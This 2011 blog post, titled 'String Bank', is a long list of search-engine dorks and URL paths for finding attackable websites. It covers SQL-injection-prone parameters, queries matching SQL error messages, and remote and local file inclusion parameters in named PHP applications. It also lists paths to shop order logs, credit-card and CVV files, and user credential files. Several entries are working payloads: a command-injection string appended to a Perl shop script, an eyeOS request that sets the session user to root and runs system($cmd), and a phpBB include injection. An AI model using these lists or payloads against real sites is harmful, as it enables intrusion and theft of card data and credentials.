Saturday, February 26, 2011

STRING BANK


String Bank: SQL ERRORS
Set of strings that expose SQL errors on certain sites.
NOTE: GOOD FOR SQL INJECTION.

String Bank: MUSIC Search

Set of strings that expose directories / folders containing media files.

String Bank: PASSWORD Search
Set of strings that expose directories / folders containing password files or edit privileges.

String Bank: CAMERAS & WEBCAMS Search
Set of strings that expose surveillance cameras & webcams.



Assorted dorks

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:recruit_details.php?id=
    inurl:index.php?cPath=

    ASP DORK
    nurl:”add.asp?bookid=”
    inurl:”add_cart.asp?num=”
    inurl:”addcart.asp?”
    inurl:”addItem.asp”
    inurl:”add-to-cart.asp?ID=”
    inurl:”addToCart.asp?idProduct=”
    inurl:”addtomylist.asp?ProdId=”
    inurl:”adminEditProductFields.asp?intProdID=”
    inurl:”advSearch_h.asp?idCategory=”
    inurl:”affiliate.asp?ID=”
    inurl:”affiliate-agreement.cfm?storeid=”
    inurl:”affiliates.asp?id=”
    inurl:”ancillary.asp?ID=”
    inurl:”archive.asp?id=”
    inurl:”article.asp?id=”
    inurl:”aspx?PageID”
    inurl:”basket.asp?id=”
    inurl:”Book.asp?bookID=”
    inurl:”book_list.asp?bookid=”
    inurl:”book_view.asp?bookid=”
    inurl:”BookDetails.asp?ID=”
    inurl:”browse.asp?catid=”
    inurl:”browse_item_details.asp”
    inurl:”Browse_Item_Details.asp?Store_Id=”
    inurl:”buy.asp?”
    inurl:”buy.asp?bookid=”
    inurl:”bycategory.asp?id=”
    inurl:”cardinfo.asp?card=”
    inurl:”cart.asp?action=”
    inurl:”cart.asp?cart_id=”
    inurl:”cart.asp?id=”
    inurl:”cart_additem.asp?id=”
    inurl:”cart_validate.asp?id=”
    inurl:”cartadd.asp?id=”
    inurl:”cat.asp?iCat=”
    inurl:”catalog.asp”
    inurl:”catalog.asp?CatalogID=”
    inurl:”catalog_item.asp?ID=”
    inurl:”catalog_main.asp?catid=”
    inurl:”category.asp”
    inurl:”category.asp?catid=”
    inurl:”category_list.asp?id=”
    inurl:”categorydisplay.asp?catid=”
    inurl:”checkout.asp?cartid=”
    inurl:”checkout.asp?UserID=”
    inurl:”checkout_confirmed.asp?order_id=”
    inurl:”checkout1.asp?cartid=”
    inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
    inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
    inurl:”comersus_optReviewReadExec.asp?idProduct=”
    inurl:”comersus_viewItem.asp?idProduct=”
    inurl:”comments_form.asp?ID=”
    inurl:”contact.asp?cartId=”
    inurl:”content.asp?id=”
    inurl:”customerService.asp?TextID1=”
    inurl:”default.asp?catID=”
    inurl:”description.asp?bookid=”
    inurl:”details.asp?BookID=”
    inurl:”details.asp?Press_Release_ID=”
    inurl:”details.asp?Product_ID=”
    inurl:”details.asp?Service_ID=”
    inurl:”display_item.asp?id=”
    inurl:”displayproducts.asp”
    inurl:”downloadTrial.asp?intProdID=”
    inurl:”emailproduct.asp?itemid=”
    inurl:”emailToFriend.asp?idProduct=”
    inurl:”events.asp?ID=”
    inurl:”faq.asp?cartID=”
    inurl:”faq_list.asp?id=”
    inurl:”faqs.asp?id=”
    inurl:”feedback.asp?title=”
    inurl:”freedownload.asp?bookid=”
    inurl:”fullDisplay.asp?item=”
    inurl:”getbook.asp?bookid=”
    inurl:”GetItems.asp?itemid=”
    inurl:”giftDetail.asp?id=”
    inurl:”help.asp?CartId=”
    inurl:”home.asp?id=”
    inurl:”index.asp?cart=”
    inurl:”index.asp?cartID=”
    inurl:”index.asp?ID=”
    inurl:”info.asp?ID=”
    inurl:”item.asp?eid=”
    inurl:”item.asp?item_id=”
    inurl:”item.asp?itemid=”
    inurl:”item.asp?model=”
    inurl:”item.asp?prodtype=”
    inurl:”item.asp?shopcd=”
    inurl:”item_details.asp?catid=”
    inurl:”item_list.asp?maingroup”
    inurl:”item_show.asp?code_no=”
    inurl:”itemDesc.asp?CartId=”
    inurl:”itemdetail.asp?item=”
    inurl:”itemdetails.asp?catalogid=”
    inurl:”learnmore.asp?cartID=”
    inurl:”links.asp?catid=”
    inurl:”list.asp?bookid=”
    inurl:”List.asp?CatID=”
    inurl:”listcategoriesandproducts.asp?idCategory=”
    inurl:”modline.asp?id=”
    inurl:”myaccount.asp?catid=”
    inurl:”news.asp?id=”
    inurl:”order.asp?BookID=”
    inurl:”order.asp?id=”
    inurl:”order.asp?item_ID=”
    inurl:”OrderForm.asp?Cart=”
    inurl:”page.asp?PartID=”
    inurl:”payment.asp?CartID=”
    inurl:”pdetail.asp?item_id=”
    inurl:”powersearch.asp?CartId=”
    inurl:”privacy.asp?cartID=”
    inurl:”prodbycat.asp?intCatalogID=”
    inurl:”prodetails.asp?prodid=”
    inurl:”prodlist.asp?catid=”
    inurl:”product.asp?bookID=”
    inurl:”product.asp?intProdID=”
    inurl:”product_info.asp?item_id=”
    inurl:”productDetails.asp?idProduct=”
    inurl:”productDisplay.asp”
    inurl:”productinfo.asp?item=”
    inurl:”productlist.asp?ViewType=Category&CategoryID= “
    inurl:”productpage.asp”
    inurl:”products.asp?ID=”
    inurl:”products.asp?keyword=”
    inurl:”products_category.asp?CategoryID=”
    inurl:”products_detail.asp?CategoryID=”
    inurl:”productsByCategory.asp?intCatalogID=”
    inurl:”prodView.asp?idProduct=”
    inurl:”promo.asp?id=”
    inurl:”promotion.asp?catid=”
    inurl:”pview.asp?Item=”
    inurl:”resellers.asp?idCategory=”
    inurl:”results.asp?cat=”
    inurl:”savecart.asp?CartId=”
    inurl:”search.asp?CartID=”
    inurl:”searchcat.asp?search_id=”

    inurl:”Select_Item.asp?id=”
    inurl:”Services.asp?ID=”
    inurl:”shippinginfo.asp?CartId=”
    inurl:”shop.asp?a=”
    inurl:”shop.asp?action=”
    inurl:”shop.asp?bookid=”
    inurl:”shop.asp?cartID=”
    inurl:”shop_details.asp?prodid=”
    inurl:”shopaddtocart.asp”
    inurl:”shopaddtocart.asp?catalogid=”
    inurl:”shopbasket.asp?bookid=”
    inurl:”shopbycategory.asp?catid=”
    inurl:”shopcart.asp?title=”
    inurl:”shopcreatorder.asp”
    inurl:”shopcurrency.asp?cid=”
    inurl:”shopdc.asp?bookid=”
    inurl:”shopdisplaycategories.asp”
    inurl:”shopdisplayproduct.asp?catalogid=”
    inurl:”shopdisplayproducts.asp”
    inurl:”shopexd.asp”
    inurl:”shopexd.asp?catalogid=”
    inurl:”shopping_basket.asp?cartID=”
    inurl:”shopprojectlogin.asp”
    inurl:”shopquery.asp?catalogid=”
    inurl:”shopremoveitem.asp?cartid=”
    inurl:”shopreviewadd.asp?id=”
    inurl:”shopreviewlist.asp?id=”
    inurl:”ShopSearch.asp?CategoryID=”
    inurl:”shoptellafriend.asp?id=”
    inurl:”shopthanks.asp”
    inurl:”shopwelcome.asp?title=”
    inurl:”show_item.asp?id=”
    inurl:”show_item_details.asp?item_id=”
    inurl:”showbook.asp?bookid=”
    inurl:”showStore.asp?catID=”
    inurl:”shprodde.asp?SKU=”
    inurl:”specials.asp?id=”
    inurl:”store.asp?id=”
    inurl:”store_bycat.asp?id=”
    inurl:”store_listing.asp?id=”
    inurl:”Store_ViewProducts.asp?Cat=”
    inurl:”store-details.asp?id=”
    inurl:”storefront.asp?id=”
    inurl:”storefronts.asp?title=”
    inurl:”storeitem.asp?item=”
    inurl:”StoreRedirect.asp?ID=”
    inurl:”subcategories.asp?id=”
    inurl:”tek9.asp?”
    inurl:”template.asp?Action=Item&pid=”
    inurl:”topic.asp?ID=”
    inurl:”tuangou.asp?bookid=”
    inurl:”type.asp?iType=”
    inurl:”updatebasket.asp?bookid=”
    inurl:”updates.asp?ID=”
    inurl:”view.asp?cid=”
    inurl:”view_cart.asp?title=”
    inurl:”view_detail.asp?ID=”
    inurl:”viewcart.asp?CartId=”
    inurl:”viewCart.asp?userID=”
    inurl:”viewCat_h.asp?idCategory=”
    inurl:”viewevent.asp?EventID=”
    inurl:”viewitem.asp?recor=”
    inurl:”viewPrd.asp?idcategory=”
    inurl:”ViewProduct.asp?misc=”
    inurl:”voteList.asp?item_ID=”
    inurl:”whatsnew.asp?idCategory=”
    inurl:”WsAncillary.asp?ID=”

    SQL DORK

    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()

    RFI AND LFI

    RFI
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/include/new-visitor.inc.php?lvc_include_dir=

    inurl:/_functions.php?prefix=

    inurl:/cpcommerce/_functions.php?prefix=

    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/ashnews.php?pathtoashnews=

    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

    inurl:/pm/lib.inc.php?pm_path=

    inurl:/b2-tools/gm-2-b2.php?b2inc=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/includes/include_once.php?include_file=

    inurl:/e107/e107_handlers/secure_img_render.php?p=

    inurl:/shoutbox/expanded.php?conf=

    inurl:/main.php?x=

    inurl:/myPHPCalendar/admin.php?cal_dir=

    inurl:/index.php/main.php?x=

    inurl:/index.php?include=

    inurl:/index.php?x=

    inurl:/index.php?open=

    inurl:/index.php?visualizar=

    inurl:/template.php?pagina=

    inurl:/index.php?pagina=

    inurl:/index.php?inc=

    inurl:/includes/include_onde.php?include_file=

    inurl:/index.php?page=

    inurl:/index.php?pg=

    inurl:/index.php?show=

    inurl:/index.php?cat=

    inurl:/index.php?file=

    inurl:/db.php?path_local=

    inurl:/index.php?site=

    inurl:/htmltonuke.php?filnavn=

    inurl:/livehelp/inc/pipe.php?HCL_path=

    inurl:/hcl/inc/pipe.php?HCL_path=

    inurl:/inc/pipe.php?HCL_path=

    inurl:/support/faq/inc/pipe.php?HCL_path=

    inurl:/help/faq/inc/pipe.php?HCL_path=

    inurl:/helpcenter/inc/pipe.php?HCL_path=

    inurl:/live-support/inc/pipe.php?HCL_path=

    inurl:/gnu3/index.php?doc=

    inurl:/gnu/index.php?doc=

    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

    inurl:/forum/install.php?phpbb_root_dir=

    inurl:/includes/calendar.php?phpc_root_path=

    inurl:/includes/setup.php?phpc_root_path=

    inurl:/inc/authform.inc.php?path_pre=

    inurl:/include/authform.inc.php?path_pre=

    inurl:index.php?nic=

    inurl:index.php?sec=

    inurl:index.php?content=

    inurl:index.php?link=

    inurl:index.php?filename=

    inurl:index.php?dir=

    inurl:index.php?document=

    inurl:index.php?view=

    inurl:*.php?sel=

    inurl:*.php?session=&content=

    inurl:*.php?locate=

    inurl:*.php?place=

    inurl:*.php?layout=

    inurl:*.php?go=

    inurl:*.php?catch=

    inurl:*.php?mode=

    inurl:*.php?name=

    inurl:*.php?loc=

    inurl:*.php?f=

    inurl:*.php?inf=

    inurl:*.php?pg=

    inurl:*.php?load=

    inurl:*.php?naam=

    allinurl:/index.php?page= site:*.dk

    allinurl:/index.php?file= site:*.dk

    INURL OR ALLINURL WITH:

    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

    /includes/header.php?systempath=

    /Gallery/displayCategory.php?basepath=

    /index.inc.php?PATH_Includes=

    /ashnews.php?pathtoashnews=

    /ashheadlines.php?pathtoashnews=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /demo/includes/init.php?user_inc=

    /jaf/index.php?show=

    /inc/shows.inc.php?cutepath=

    /poll/admin/common.inc.php?base_path=

    /pollvote/pollvote.php?pollname=

    /sources/post.php?fil_config=

    /modules/My_eGallery/public/displayCategory.php?basepath=

    /bb_lib/checkdb.inc.php?libpach=

    /include/livre_include.php?no_connect=lol&chem_absolu=

    /index.php?from_market=Y&pageurl=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /pivot/modules/module_db.php?pivot_path=

    /modules/4nAlbum/public/displayCategory.php?basepath=

    /derniers_commentaires.php?rep=

    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    /modules/coppermine/include/init.inc.php?CPG_M_DIR=

    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

    /coppermine/themes/maze/theme.php?THEME_DIR=

    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

    /myPHPCalendar/admin.php?cal_dir=

    /agendax/addevent.inc.php?agendax_path=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

    /main.php?page=

    /default.php?page=

    /index.php?action=

    /index1.php?p=

    /index2.php?x=

    /index2.php?content=

    /index.php?conteudo=

    /index.php?cat=

    /include/new-visitor.inc.php?lvc_include_dir=

    /modules/agendax/addevent.inc.php?agendax_path=

    /shoutbox/expanded.php?conf=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /pivot/modules/module_db.php?pivot_path=

    /library/editor/editor.php?root=

    /library/lib.php?root=

    /e107/e107_handlers/secure_img_render.php?p=

    /zentrack/index.php?configFile=

    /main.php?x=

    /becommunity/community/index.php?pageurl=

    /GradeMap/index.php?page=

    /index4.php?body=

    /side/index.php?side=

    /main.php?page=

    /es/index.php?action=

    /index.php?sec=

    /index.php?main=

    /index.php?sec=

    /index.php?menu=

    /html/page.php?page=

    /page.php?view=

    /index.php?menu=

    /main.php?view=

    /index.php?page=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /index.php?show=

    /tutorials/print.php?page=

    /index.php?page=

    /index.php?level=

    /index.php?file=

    /index.php?inter_url=

    /index.php?page=

    /index2.php?menu=

    /index.php?level=

    /index1.php?main=

    /index1.php?nav=

    /index1.php?link=

    /index2.php?page=

    /index.php?myContent=

    /index.php?TWC=

    /index.php?sec=

    /index1.php?main=

    /index2.php?page=

    /index.php?babInstallPath=

    /main.php?body=

    /index.php?z=

    /main.php?view=

    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    /index.php?file=

    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    1. allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=

    2. allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    3. allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    4. allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=

    5. allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    6. allinurl:ihm.php?p=

    7. Keyword : “powered by AllMyLinks”
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    8. allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    9. allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=

    10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=

    11. keyword : “Powered by phpBB 2.0.6?
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

    12. keyword : “powered by CubeCart 3.0.6?
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    13. keyword : “powered by paBugs 2.0 Beta 3?
    /class.mysql.php?path_to_bt_dir=

    14. allinurl:”powered by AshNews”, allinurl:AshNews or allinurl: /ashnews.php
    /ashnews.php?pathtoashnews=

    15. keyword : /phorum/login.php
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

    16. allinurl:ihm.php?p=*

    14. keyword : “powered eyeOs”
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
    replaced with:
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

    15. allinurl:.php?bodyfile=

    16. allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    17. allinurl:forums.html
    /modules.php?name=

    18. allinurl:/default.php?page=home

    19. allinurl:/folder.php?id=

    20. allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=

    21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    22. allinurl:application.php?base_path=
    /application.php?base_path=

    23. allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=

    24. allinurlp:hpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    25. key word : “powered by Fantastic News v2.1.2?
    /archive.php?CONFIG[script_path]=

    26. keyword: “powered by smartblog” AND inurl:?page=login
    /index.php?page=

    27. allinurl:/forum/
    /forum/admin/index.php?inc_conf=

    28. keyword:”Powered By FusionPHP”
    /templates/headline_temp.php?nst_inc=

    29. allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=

    30. allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=

    31. keyword : “Powered by iUser”
    /common.php?include_path=

    32. allinurl: “static.php?load=”
    /static.php?load=

    33. keyword : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

    34. keyword: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

    35. allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=
    LFI

    acion=
    act=
    action=
    API_HOME_DIR=
    board=
    cat=
    client_id=
    cmd=
    cont=
    current_frame=
    date=
    detail=
    dir=
    display=
    download=
    f=
    file=
    fileinclude=
    filename=
    firm_id=
    g=
    getdata=
    go=
    HT=
    idd=
    inc=
    incfile=
    incl=
    include_file=
    include_path=
    infile=
    info=
    ir=
    lang=
    language=
    link=
    load=
    main=
    mainspot=
    msg=
    num=
    openfile=
    p=
    page=
    pagina=
    path=
    path_to_calendar=
    pg=
    plik
    qry_str=
    ruta=
    safehtml=
    section=
    showfile=
    side=
    site_id=
    skin=
    static=
    str=
    strona=
    sub=
    tresc=
    url=
    user=



/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&ac count=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
